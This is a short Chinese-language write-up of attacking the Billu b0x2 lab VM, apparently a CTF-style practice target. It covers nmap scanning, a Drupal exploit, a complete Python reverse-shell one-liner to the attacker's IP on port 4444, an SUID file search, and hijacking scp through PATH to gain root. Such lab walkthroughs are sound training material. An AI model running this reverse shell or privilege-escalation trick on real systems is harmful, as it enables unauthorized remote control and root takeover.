渗透Billu b0x2靶机

1.nmap扫描与漏洞寻找

使用nmap扫描，扫描结果如下：

发现开放了22、80、111、8080端口，先访问web服务，发现Drupal，寻找其漏洞。

找到后，下载exp，直接按照说明使用，成功连接服务器。

为了方便后续的操作，使用python脚本反弹shell，在kali使用nc命令监听4444端口，python脚本如下，其中192.168.223.184是kali的ip：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.223.184",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

2.提权

可以看到这是Ubuntu系统，内核是4.4.0，下载linux.sh进行漏洞审计，利用“脏牛”提权失败，利用其他内核漏洞提权同样失败。

用其他方法提权。

linux中除了r w x 三个权限外(分别代表r 读，w写，x执行)，还有两个特殊的权限s 和t，当s权限在文件所有者x权限上时，例如：-rwsr-xr-x，此时称为Set UID，简称为SUID的特殊权限，即当执行该文件时将具有该文件所有者的权限。

在根目录寻找此类型文件：

find / -perm -u=s -type f 2>/dev/null

/opt/s就符合条件，使用strings打印，注意到scp命令，就选择它了。

在/tmp目录下建立scp文件，赋予可执行权限，把它添加到环境变量，这样执行/opt/s时，当他运行到scp时，就会执行我们在/tmp目录下建立的这个scp。

成功获得root权限。